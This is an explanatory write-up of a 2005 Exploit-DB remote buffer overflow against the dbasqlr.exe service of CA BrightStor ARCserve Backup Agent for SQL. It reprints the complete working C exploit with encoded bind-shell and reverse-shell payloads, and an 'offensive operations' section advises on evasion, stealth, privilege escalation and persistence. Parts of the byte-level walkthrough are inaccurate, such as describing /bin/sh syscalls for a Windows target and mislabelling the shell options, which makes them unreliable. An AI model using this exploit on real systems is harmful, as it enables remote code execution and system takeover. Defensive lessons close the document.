CA BrightStor ARCserve Backup Agent 'dbasqlr.exe' Remote Overflow Explained

What this paper is

This paper details a remote buffer overflow vulnerability in the CA BrightStor ARCserve Backup Agent for SQL, specifically within the dbasqlr.exe component. The exploit allows an attacker to remotely execute arbitrary code on a vulnerable system by sending a specially crafted network request. The exploit code provided includes payloads for both a bind shell and a reverse shell.

Simple technical breakdown

The dbasqlr.exe service listens on a specific network port (6070). When it receives a network connection, it processes data sent by the client. This vulnerability exists because the service doesn't properly check the size of the data it receives. An attacker can send a much larger amount of data than expected, overwriting memory beyond the intended buffer. This overwrite can corrupt critical program data, including the instruction pointer (which tells the program where to execute next). By carefully crafting the overflowing data, an attacker can redirect the program's execution to their own malicious code (the shellcode), gaining control of the system.

The exploit code in this paper constructs a large buffer filled with 'A' characters, which is typical for buffer overflow exploits to overwrite the target buffer and then control the instruction pointer. It then injects shellcode (either bind or reverse shell) into this buffer and sends it to the vulnerable service.

Complete code and payload walkthrough

The provided C code implements an exploit for the dbasqlr.exe service. It includes two shellcode payloads: bindshell and reverseshell.

C Code Breakdown

• Includes:

  • stdio.h: Standard input/output functions.
  • sys/socket.h: Socket programming functions.
  • netinet/in.h: Internet address family structures.
  • netdb.h: Network database functions (like gethostbyname).

• #define PORT 6070: Defines the default port the vulnerable service listens on.

• unsigned char bindshell[] = "...": This is an array of bytes representing the machine code for a bind shell.

  • Purpose: When executed, this shellcode will create a listening socket on the target machine, waiting for an incoming connection. Once connected, it will provide a command shell.
  • Payload Structure (Unknown specific instructions without disassembly, but general intent):
    • Initial instructions likely set up registers and prepare for system calls.
    • It will involve system calls to socket(), bind(), listen(), and accept() to establish a listening socket.
    • Then, it will likely use dup2() to redirect standard input, output, and error to the accepted socket.
    • Finally, it will execute /bin/sh (or a similar shell) using execve().
    • The bytes are encoded/obfuscated, likely to avoid null bytes or specific patterns that might be filtered. The XORing with 0x99 or similar values is a common technique for this.

• unsigned char reverseshell[] = "...": This is an array of bytes representing the machine code for a reverse shell.

  • Purpose: When executed, this shellcode will connect back to a specified attacker-controlled machine and provide a command shell.
  • Payload Structure (Unknown specific instructions without disassembly, but general intent):
    • Similar to the bindshell, it starts with setup instructions.
    • It will involve system calls to socket().
    • It will then use connect() to establish a connection to the attacker's IP address and port.
    • Similar to the bindshell, it will use dup2() to redirect standard I/O to the connected socket.
    • Finally, it will execute /bin/sh using execve().
    • Crucially, this shellcode has placeholders for the attacker's IP (cbip) and port (cbport), which are filled in by the C code before sending. The XORing with 0x9999 and 0x99999999 is part of the shellcode's decoding mechanism.

• void exploit(int s, unsigned long cbip, unsigned short cbport, int option) Function:

  • int s: The socket descriptor for the established connection to the target service.
  • unsigned long cbip: The IP address for the reverse shell (if option is 0).
  • unsigned short cbport: The port for the reverse shell (if option is 0).
  • int option: A flag to choose between bind shell (0) and reverse shell (1).
  • unsigned long pushesp = 0x20c0c1ab;: This is a hardcoded value, likely an address within the vulnerable dbasqlr.exe process that the attacker wants to jump to after the overflow. This is often a "No Operation" (NOP) sled or a specific instruction that leads to the shellcode. Without disassembly, its exact purpose is unknown, but it's intended to be the return address.
  • char buffer[3289];: A large buffer to construct the exploit payload. The size is chosen to be significantly larger than the vulnerable buffer.
  • bzero(&buffer, sizeof(buffer));: Clears the buffer.
  • memset(buffer, 0x41, sizeof(buffer) - 1);: Fills the buffer with 'A' characters (hex 0x41). This is the overflow data.
  • memcpy(buffer + 1337, "\x81\xc4\x54\xf2\xff\xff", 6);: This inserts a specific sequence of bytes at offset 1337. These bytes might be related to stack manipulation or a jump instruction. The sequence \x81\xc4\x54\xf2\xff\xff is not immediately obvious without context of the target binary's assembly, but it could be part of a stack adjustment or a jump instruction.
  • memcpy(buffer + 3168, (unsigned char*)&pushesp, 4);: Places the pushesp value at offset 3168. This is likely intended to overwrite the saved instruction pointer on the stack.
  • memcpy(buffer + 3172, "\xe9\xd0\xf8\xff\xff", 5);: Inserts a jump instruction (\xe9) followed by an offset. This is likely a relative jump intended to land near the shellcode or the pushesp address.
  • if (option == 0) block (Reverse Shell):
    • memcpy(&reverseshell[111], &cbip, 4);: Copies the target IP address into the reverseshell payload at offset 111. This is where the reverse shell expects the destination IP.
    • memcpy(&reverseshell[118], &cbport, 2);: Copies the target port into the reverseshell payload at offset 118. This is where the reverse shell expects the destination port.
    • memcpy(buffer + 1343, reverseshell, sizeof(reverseshell) - 1);: Copies the modified reverse shellcode into the main buffer starting at offset 1343.
  • else block (Bind Shell):
    • memcpy(buffer + 1343, bindshell, sizeof(bindshell) - 1);: Copies the bind shellcode into the main buffer starting at offset 1343.
  • printf("attacking with %u bytes...", strlen(buffer));: Informs the user about the payload size.
  • write(s, buffer, strlen(buffer));: Sends the crafted buffer over the network socket.
  • printf("done!\n");: Indicates completion of the write operation.
  • close(s);: Closes the connection.

• int main(int argc, char* argv[]) Function:

  • Argument Handling: Checks for the correct number of command-line arguments.
    • argc != 2: For bind shell, expects only the target IP.
    • argc != 4: For reverse shell, expects target IP, callback IP, and callback port.
  • Hostname Resolution:
    • gethostbyname(argv[1]): Resolves the target IP address.
  • Socket Creation and Connection:
    • Sets up sockaddr_in structure.
    • Creates a TCP socket (AF_INET, SOCK_STREAM).
    • connect(s, (struct sockaddr*)&remote_addr, sizeof(struct sockaddr)): Attempts to connect to the target service on port 6070.
  • Exploit Execution:
    • if (argc == 4) (Reverse Shell):
      • cbip = inet_addr(argv[2]) ^ (unsigned long)0x99999999;: Converts the callback IP string to an integer and XORs it with 0x99999999. This is part of the shellcode's decoding mechanism. The inet_addr function returns an IP address in network byte order, and the XOR operation is applied to it.
      • cbport = htons(atoi(argv[3])) ^ (unsigned short)0x9999;: Converts the callback port string to an integer, then to network byte order (htons), and XORs it with 0x9999. This is also part of the shellcode's decoding.
      • exploit(s, cbip, cbport, 0);: Calls the exploit function to send the reverse shell payload.
    • else (Bind Shell):
      • exploit(s, (unsigned long)NULL, (unsigned short)NULL, 1);: Calls the exploit function to send the bind shell payload.

Shellcode Byte Analysis (General Intent)

bindshell[]

• \xeb\x19: Short jump (EB) of 25 bytes. This likely skips over some initial data or setup.
• \x5e: Pop ESI.
• \x31\xc9: XOR ECX with ECX (sets ECX to 0).
• \x81\xe9\x89\xff\xff\xff: Subtract 0xffffff89 from ECX. This is a common way to set ECX to a specific large negative value, often used for string lengths or loop counters.
• \x81\x36\x80\xbf\x32\x94: XOR [ESI] with 0x9432bf80. This is part of the decoding routine for the shellcode itself. ESI likely points to the start of the encoded shellcode.
• \x81\xee\xfc\xff\xff\xff: Subtract 0xfffffffc from ESI. This is another way to manipulate ESI, possibly to point to the next segment or adjust an index.
• \xe2\xf2: Loop instruction, likely looping based on ECX.
• \xeb\x05: Short jump of 5 bytes.
• \xe8\xe2\xff\xff\xff: Relative call. This is a common way to get the address of the next instruction (shellcode) and push it onto the stack.
• \x03\x53\x06\x1f\x74\x57\x75\x95\x80\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04**: This large block of bytes is the actual shellcode, likely XOR-encoded. The preceding instructions are responsible for decoding it. The specific bytes are the machine code for the bind shell functionality.

reverseshell[]

• \xEB\x10: Short jump of 16 bytes.

• \x5B: Pop EBX.

• \x4B: Decrement EBX.

• \x33\xC9: XOR ECX with ECX (sets ECX to 0).

• \x66\xB9\x25\x01: Move 0x0125 into CX. This is likely a counter for a loop.

• \x80\x34\x0B\x99: XOR byte at [ESI] with 0x99. This is the start of the XOR decoding for the shellcode. ESI points to the encoded shellcode.

• \xE2\xFA: Loop instruction, likely based on ECX.

• \xEB\x05: Short jump of 5 bytes.

• \xE8\xEB\xFF\xFF\xFF: Relative call.

• \x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x17\xD7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x52\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0: This is the main body of the reverse shellcode, also XOR-encoded. The memcpy operations in the C code insert the target IP and port into specific locations within this byte array, which the shellcode will then use after decoding.

• Code Fragment/Block -> Practical Purpose Mapping:

  • #define PORT 6070 -> Target service port.
  • bindshell[] -> Machine code for a bind shell.
  • reverseshell[] -> Machine code for a reverse shell (with placeholders).
  • exploit(...) function -> Orchestrates the payload construction and sending.
  • char buffer[3289]; -> Large buffer for overflow data and shellcode.
  • memset(buffer, 0x41, ...) -> Fills buffer with 'A's for overflow.
  • memcpy(buffer + 1337, "\x81\xc4\x54\xf2\xff\xff", 6); -> Inserts specific bytes, likely for stack manipulation or control flow redirection.
  • memcpy(buffer + 3168, &pushesp, 4); -> Overwrites the saved instruction pointer with pushesp (likely a jump target).
  • memcpy(buffer + 3172, "\xe9\xd0\xf8\xff\xff", 5); -> Inserts a relative jump instruction.
  • memcpy(&reverseshell[111], &cbip, 4); -> Injects target IP into reverse shellcode.
  • memcpy(&reverseshell[118], &cbport, 2); -> Injects target port into reverse shellcode.
  • memcpy(buffer + 1343, shellcode, ...); -> Appends shellcode to the main buffer.
  • write(s, buffer, strlen(buffer)); -> Sends the complete exploit payload over the network.
  • main(...) function -> Handles argument parsing, network connection, and calling exploit.
  • gethostbyname(argv[1]) -> Resolves target hostname.
  • connect(...) -> Establishes connection to the vulnerable service.
  • inet_addr(argv[2]) ^ 0x99999999 -> Decodes/prepares target IP for reverse shell.
  • htons(atoi(argv[3])) ^ 0x9999 -> Decodes/prepares target port for reverse shell.

Practical details for offensive operations teams

• Required Access Level: Network access to the target system's IP address and port 6070. No local access is required.
• Lab Preconditions:
  • A vulnerable instance of CA BrightStor ARCserve Backup Agent for SQL running on a Windows machine. The exact version is not specified but likely an older one.
  • The dbasqlr.exe process must be running and accessible over the network.
  • A Linux or Windows machine to run the exploit code.
  • For reverse shells, an attacker-controlled machine must be listening on the specified callback IP and port.
• Tooling Assumptions:
  • A C compiler (like GCC on Linux) to compile the exploit code.
  • Standard networking utilities (netcat, nmap) for reconnaissance and testing.
  • A debugger (like WinDbg or GDB) would be invaluable for analyzing the target binary and shellcode if needed.
• Execution Pitfalls:
  • Target Version: The exploit is highly specific to the version of ARCserve Backup Agent for SQL that has this particular buffer overflow. Newer versions are likely patched.
  • Firewalls: Network firewalls blocking port 6070 will prevent the exploit from reaching the target service.
  • Antivirus/IDS: Signature-based detection might flag the exploit traffic or the shellcode itself. Evasion techniques might be necessary.
  • Shellcode Reliability: Shellcode can be fragile. Null bytes, incorrect encoding, or variations in the target environment (e.g., different Windows versions, service pack levels) can cause it to fail.
  • pushesp Address: The pushesp address (0x20c0c1ab) is a hardcoded value. If the memory layout of the target process differs (e.g., due to ASLR, though unlikely for such old software, or different DLL loading), this address might be wrong, leading to a crash instead of code execution. The relative jump (\xe9\xd0\xf8\xff\xff) is also dependent on the shellcode's position relative to the jump instruction.
  • IP/Port Encoding: The XOR encoding for the callback IP and port in the reverse shell is critical. If the XOR keys (0x99999999, 0x9999) are incorrect or the shellcode expects a different encoding, the connection will fail.
  • Payload Size: The buffer size (3289 bytes) and the offsets where data is written are critical. Incorrect offsets will lead to the overflow not hitting the intended memory locations.
• Tradecraft Considerations:
  • Reconnaissance: Identify the target application and its version. Port scanning for 6070 is essential.
  • Payload Customization: For reverse shells, ensure the callback IP and port are reachable and not blocked by egress filtering.
  • Stealth: If aiming for stealth, consider obfuscating the exploit traffic or using a custom shellcode that avoids common signatures.
  • Post-Exploitation: Once a shell is obtained, immediately consider privilege escalation and persistence.

Where this was used and when

• Context: This exploit targets a specific vulnerability in CA BrightStor ARCserve Backup Agent for SQL. Such backup agents often run with elevated privileges and are critical infrastructure components. Exploiting them could lead to significant compromise.
• Approximate Years/Dates: The exploit was published on August 3, 2005. This indicates that the vulnerability existed in versions of the software released prior to this date. Given the age of the software and the exploit, it's highly probable that this vulnerability is no longer present in modern, supported versions of ARCserve or its successors. It would have been relevant in the mid-2000s.

Defensive lessons for modern teams

• Patch Management: Regularly update all software, especially critical infrastructure like backup solutions. This vulnerability was likely patched in later versions.
• Network Segmentation: Isolate critical systems and services. Restrict access to ports like 6070 to only necessary internal or trusted sources.
• Intrusion Detection/Prevention Systems (IDS/IPS): Deploy and maintain IDS/IPS to detect and block exploit attempts targeting known vulnerabilities. Signature updates are crucial.
• Vulnerability Scanning: Regularly scan your network for vulnerable services and applications.
• Least Privilege: Ensure services and applications run with the minimum necessary privileges. This limits the impact if a compromise does occur.
• Application Whitelisting: Prevent unauthorized executables, including shellcode, from running.
• Buffer Overflow Protections: Modern operating systems and compilers have built-in protections like DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization) that make traditional buffer overflows much harder to exploit. However, understanding the principles is still valuable.

ASCII visual (if applicable)

This exploit involves a direct network connection and code injection. A simple flow diagram can illustrate the process:

+-----------------+       +-----------------------+       +-------------------+
| Attacker Machine| ----> | Target IP:PORT 6070   | ----> | Vulnerable Service|
| (Exploit Client)|       | (dbasqlr.exe)         |       | (dbasqlr.exe)     |
+-----------------+       +-----------------------+       +-------------------+
        |                                                        |
        | 1. Connect & Send Malicious Data                       | 2. Process Data
        |    (Overflow buffer + Shellcode)                       |    (Buffer Overflow)
        |                                                        |
        |                                                        | 3. Redirect Execution
        |                                                        |    to Shellcode
        |                                                        |
        | <------------------------------------------------------| 4. Shellcode Execution
        |    (Bind Shell: Listen on port X)                      |    (e.g., /bin/sh)
        |    OR                                                  |
        |    (Reverse Shell: Connect back to Attacker IP:Port)   |

Explanation:

1. The attacker's machine connects to the target IP address on port 6070.
2. A specially crafted, oversized data packet is sent.
3. The vulnerable dbasqlr.exe service attempts to process this data but overflows its buffer.
4. The overflow overwrites control structures, allowing the attacker to redirect execution to the injected shellcode.
5. The shellcode executes, either by opening a listening port on the target (bind shell) or by connecting back to the attacker (reverse shell), providing a command shell.

Source references

• PAPER ID: 1130
• PAPER TITLE: CA BrightStor ARCserve Backup Agent - 'dbasqlr.exe' Remote Overflow
• AUTHOR: cybertronic
• PUBLISHED: 2005-08-03
• PAPER URL: https://www.exploit-db.com/papers/1130
• RAW URL: https://www.exploit-db.com/raw/1130

Original Exploit-DB Content (Verbatim)

/*
 * CA BrightStor ARCserve Backup Agent for SQL - dbasqlr.exe
 *
 * cybertronic[at]gmx[dot]net
 *
 */

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define PORT 6070

unsigned char bindshell[] =
"\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff\xff\xff\x81\x36\x80\xbf\x32"
"\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
"\x03\x53\x06\x1f\x74\x57\x75\x95\x80\xbf\xbb\x92\x7f\x89\x5a\x1a"
"\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09\xf9\x3a\x6b\xb6\xd7\x9f\x4d"
"\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6\xb3\x5a\xf8\xec\xbf\x32\xfc"
"\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf\xeb\xcd\xc2\x88\x36\x74\x90"
"\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad\xbe\x32\x94\x09\xf9\x22\x6b"
"\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81\xbf\x32\x1d\xc6\xab\xcd\xe2"
"\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81\xbf\x32\x1d\xc6\xa7\xcd\xe2"
"\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80\xbf\x32\x1d\xc6\xa3\xcd\xe2"
"\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80\xbf\x32\x1d\xc6\x9f\xcd\xe2"
"\x84\xd7\x96\x39\xae\x56\xda\x4a\x80\xbf\x32\x1d\xc6\x9b\xcd\xe2"
"\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80\xbf\x32\x1d\xc6\x97\xcd\xe2"
"\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80\xbf\x32\x1d\xc6\x93\x01\x6b"
"\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81\xbe\x32\x94\x7f\xe9\x2a\xc4"
"\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6\xa3\xb9\x4c\xd7\xe8\x5a\x96"
"\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3\x40\x64\xb4\xd7\xec\xcd\xc2"
"\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50\xd7\x57\xec\xe5\xbf\x5a\xf7"
"\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4\x32\x0e\xb0\xb3\x7f\x01\x5d"
"\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4\xaf\x76\x6a\xc4\x9b\x0f\x1d"
"\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4\x9b\x62\x19\xc4\x9b\x22\xc0"
"\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f\xc9\x02\xc5\x7f\xe9\x22\x1f"
"\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b\x77\x65\x6b\xd6\x93\xcd\xc2"
"\x94\xea\x64\xf0\x21\x8f\x32\x94\x80\x3a\xf2\xec\x8c\x34\x72\x98"
"\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89\x34\x72\xa0\x0b\x17\x8a\x94"
"\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80\xec\x67\xc2\xd7\x34\x5e\xb0"
"\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83\x6a\xb9\xde\x98\x34\x68\xb4"
"\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83\x4a\x01\x6b\x7c\x8c\xf2\x38"
"\xba\x7b\x46\x93\x41\x70\x3f\x97\x78\x54\xc0\xaf\xfc\x9b\x26\xe1"
"\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c\xf4\xb9\xce\x9c\xbc\xef\x1f"
"\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b\x6a\x6d\xca\xdd\xe4\xf0\x90"
"\x80\x2f\xa2\x04";

unsigned char reverseshell[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9"
"\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3"
"\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE"
"\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99"
"\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF"
"\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6"
"\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF"
"\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD"
"\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD"
"\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD"
"\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66"
"\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66"
"\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB"
"\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3"
"\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3"
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
"\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x17\xD7\x97\x75"
"\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x52\x74\x65\xA2"
"\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0";

void
exploit ( int s, unsigned long cbip, unsigned short cbport, int option )
{
	unsigned long pushesp = 0x20c0c1ab;
	char buffer[3289];

	bzero ( &buffer, sizeof ( buffer ) );
	memset ( buffer, 0x41, sizeof ( buffer ) - 1 );
	memcpy ( buffer + 1337, "\x81\xc4\x54\xf2\xff\xff", 6 );
	memcpy ( buffer + 3168, ( unsigned char* ) &pushesp, 4 );
	memcpy ( buffer + 3172, "\xe9\xd0\xf8\xff\xff", 5 );

	if ( option == 0 )
	{
		memcpy ( &reverseshell[111], &cbip, 4);
		memcpy ( &reverseshell[118], &cbport, 2);
		memcpy ( buffer + 1343, reverseshell, sizeof ( reverseshell ) - 1 );
	}
	else
		memcpy ( buffer + 1343, bindshell, sizeof ( bindshell ) - 1 );

	printf ( "attacking with %u bytes...", strlen ( buffer ) );
	write ( s, buffer, strlen ( buffer ) );
	printf ( "done!\n" );
	close ( s );
}

int
main ( int argc, char* argv[] )
{
	int s;
	unsigned long cbip;
	unsigned short cbport;
	struct sockaddr_in remote_addr;
	struct hostent* host_addr;

	if ( argc != 2 )
		if ( argc != 4 )
			{ fprintf ( stderr, "Usage\n-----\n[bindshell] %s <ip>\n[reverseshell] %s <ip> <cbip> <cbport>\n", argv[0], argv[0] ); exit ( 1 ); }

	if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL )
		{ fprintf ( stderr, "Cannot resolve hostname: %s\n", argv[1] ); exit ( 1 ); }

	remote_addr.sin_family = AF_INET;
	remote_addr.sin_addr   = * ( ( struct in_addr * ) host_addr->h_addr );
	remote_addr.sin_port   = htons ( PORT );

	s = socket ( AF_INET, SOCK_STREAM, 0 );
	printf ( "connecting to %s:%u...", argv[1], PORT );
	if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ==  -1 )
		{ printf ( "failed!\n" ); exit ( 1 ); }
	printf ( "ok!\n" );

	if ( argc == 4 )
	{
		cbip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999;
		cbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999;
		exploit ( s, cbip, cbport, 0 );
	}
	else
		exploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 );
}

// milw0rm.com [2005-08-03]